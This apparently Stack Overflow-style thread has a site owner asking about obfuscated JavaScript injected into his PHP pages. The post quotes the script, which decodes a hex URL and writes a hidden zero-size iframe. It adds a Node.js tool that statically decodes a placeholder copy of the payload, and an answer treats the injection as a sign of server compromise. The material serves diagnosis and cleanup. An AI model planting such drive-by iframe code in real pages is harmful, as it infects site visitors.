JavaScript being injected in my PHP Pages

I have a website, and I just discovered that somehow someone injected JavaScript on my page. How can I figure out what it does and how they did it?

<script> var x = unescape("%68% (**** some other hex characters here
****%74%2e%63%6e%2f%76%69%64");document.write("<i"+"fr"+"am"+"e 
s"+"r"+"c=\""+x+"/ind"+"e"+"x.p"+"hp\" w"+"id"+"th=\"0\" he"+"i"+"ght=\"0\" 
fr"+"a"+"m"+"ebor"+"de"+"r=\"0\"><"+"/ifra"+"m"+"e>"); </script>

I'm not sure how it got there. Does anyone know how it got there, and what I can do to remove it?

Asked Oct 30 '09 16:10 by thegunner
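To answer the "how can I figure out what it does" part without ever running the injected script, the following is an added example (not code from the question or the answer): a small Node.js script that statically decodes this style of payload, that is, the `unescape()` of a `%XX` string, the markup split into many `"a"+"b"` literals, and the final `document.write`. It then reports the hidden iframe and scans a set of files for the same pattern. The sample payload and the file contents are constructed for the example; the host `example.invalid` is a placeholder, not the real one from the post, and the elided hex in the question is not reproduced.

```javascript
// Added example, not code from the original post: statically decode an obfuscated
// <script> of the shape quoted in the question WITHOUT executing it.

// CONSTRUCTED sample in the same shape as the posted snippet. The %XX string
// decodes to "http://example.invalid" (placeholder host, not the real one).
const SAMPLE = `<script> var x = unescape("%68%74%74%70%3a%2f%2f%65%78%61%6d%70%6c%65%2e%69%6e%76%61%6c%69%64");document.write("<i"+"fr"+"am"+"e s"+"r"+"c=\\""+x+"/ind"+"e"+"x.p"+"hp\\" w"+"id"+"th=\\"0\\" he"+"i"+"ght=\\"0\\" fr"+"a"+"m"+"ebor"+"de"+"r=\\"0\\"><"+"/ifra"+"m"+"e>"); </script>`;

// CONSTRUCTED stand-in for files under a web root: one infected, one clean.
const FILES = {
  "public_html/index.php": '<?php echo "hello"; ?>\n<html><body>Hi</body>' + SAMPLE + "</html>",
  "public_html/about.php": '<html><body><script>console.log("legit");</script></body></html>',
};

// Decode %XX sequences the way the legacy unescape() does, without calling it.
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Return the text between `callee` and its matching ')', honouring quoted strings.
function extractCallArgument(src, callee) {
  const start = src.indexOf(callee);
  if (start < 0) return null;
  let depth = 1, quote = null;
  for (let i = start + callee.length; i < src.length; i++) {
    const c = src[i];
    if (quote) {
      if (c === "\\") i++;             // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'") quote = c;
    else if (c === "(") depth++;
    else if (c === ")" && --depth === 0) return src.slice(start + callee.length, i);
  }
  return null;
}

// Evaluate a restricted expression: string literals and known identifiers joined
// by '+'. Anything else is rejected, so no attacker code is ever executed.
function evalConcatExpression(expr, vars) {
  const parts = [];
  let i = 0;
  while (i < expr.length) {
    const c = expr[i];
    if (/\s/.test(c) || c === "+") { i++; continue; }
    if (c === '"' || c === "'") {
      let j = i + 1, out = "";
      while (j < expr.length && expr[j] !== c) {
        if (expr[j] === "\\") { out += expr[j + 1]; j += 2; } // \" -> "
        else { out += expr[j]; j++; }
      }
      parts.push(out); i = j + 1; continue;
    }
    const m = /^[A-Za-z_$][\w$]*/.exec(expr.slice(i));
    if (m && m[0] in vars) { parts.push(vars[m[0]]); i += m[0].length; continue; }
    throw new Error("unsupported token at offset " + i);
  }
  return parts.join("");
}

// Decode `var name = unescape("...")` assignments, reconstruct what document.write
// would emit, and pull out the attributes of every iframe in that markup.
function decodeInjectedScript(src) {
  const vars = {};
  const varRe = /var\s+([A-Za-z_$][\w$]*)\s*=\s*unescape\(\s*"([^"]*)"\s*\)/g;
  let m;
  while ((m = varRe.exec(src)) !== null) vars[m[1]] = percentDecode(m[2]);
  const arg = extractCallArgument(src, "document.write(");
  const written = arg === null ? "" : evalConcatExpression(arg, vars);
  const iframes = [];
  const ifr = /<iframe\b([^>]*)>/gi;
  while ((m = ifr.exec(written)) !== null) {
    const attrs = {}, attrRe = /([\w-]+)\s*=\s*"([^"]*)"/g;
    let a;
    while ((a = attrRe.exec(m[1])) !== null) attrs[a[1]] = a[2];
    iframes.push(attrs);
  }
  return { vars, written, iframes };
}

// A zero-size iframe written from obfuscated code is the classic drive-by marker.
function hiddenFrameIndicators(result) {
  const reasons = [];
  for (const f of result.iframes) {
    if (parseInt(f.width, 10) === 0 || parseInt(f.height, 10) === 0) {
      reasons.push("zero-size iframe to " + f.src);
    }
  }
  return reasons;
}

// Given {path: content}, list the files whose <script> blocks decode to a hidden iframe.
function scanFiles(files) {
  const findings = [];
  for (const [path, content] of Object.entries(files)) {
    const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
    let m;
    while ((m = scriptRe.exec(content)) !== null) {
      if (!/unescape\(/.test(m[1]) || !/document\.write\(/.test(m[1])) continue;
      let decoded;
      try { decoded = decodeInjectedScript(m[1]); } catch (e) { continue; }
      for (const reason of hiddenFrameIndicators(decoded)) findings.push({ path, reason });
    }
  }
  return findings;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(decodeInjectedScript(SAMPLE).written);
  console.log(scanFiles(FILES));
}
```

Run it with `node` and the first line printed is the reassembled markup, an `<iframe>` with `width="0"` and `height="0"` pointing at the decoded host, which is exactly the kind of thing the answer below warns is a browser exploit or spam landing page. Feeding real files into `scanFiles` (read them from the web root yourself) gives a list of what needs cleaning; keep copies of the infected files first, as the answer advises, since the decoded URL and the file timestamps are the evidence that tells you when and where the attacker wrote to disk.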



1 Answer

You need to know this now:

We see this at Linode quite a bit, and it's an indication that your server has been compromised by an attacker. When unescaped, it's likely to be a browser exploit that will infect your users, or a link to a spam site.

Save everything with the injected code for later analysis, and redeploy your entire server and Web stack immediately. The attacker undoubtedly has at least a shell on your box, and that will inevitably lead to root if he's crafty.

Redeploy now, keep your applications up to date, stop writing exploitable PHP, and lock down your user accounts with strong passwords or SSH keys. Not trying to pimp my company or anything, but this is such a common occurrence on poorly-managed Web boxen that we've written an article about how to completely redeploy from scratch. I suggest it several times a day.

EDIT: If you're downvoting me, please say why -- I've triaged three cases with this exact code, so I'm not making things up.

EDIT 2: There is one regard where I may be overestimating the situation, and it's only because I'm an employee of a VPS company (and I see this a lot). I made a mistake in assuming that this user's "Web host" was a server under his control, not shared hosting. That was a mistake, but there still is the chance that I'm right.

Compromise is a desperate situation where working in the dark can have disastrous consequences. If you do not know why an unauthorized party gained access to your infrastructure, you cannot rectify the problem. Since everyone assumed we're talking about managed, shared hosting here -- there is the chance that you're right and XSS is to blame. Again, the question was not presented with much data, and compromise is a situation that is not treated with enough gravity among developers in general.

I'm honestly tired of tickets that we open where a box is hitting another on the Internet with SSH probes, DoS data, URL injection, or anything for that matter -- and the Rails or PHP developer administering the box has no idea why it happened or what he can do about it. These are all things that indicate system compromise, not XSS. Therefore, my assumption that this was a server under the OP's control was misplaced, but it's forgivable (I hope) because I'm at work right now, handling those tickets.

If you'd like me to delete my answer, just say so, but I don't see any others getting votes.

Answered Oct 12 '22 23:10 by Jed Smith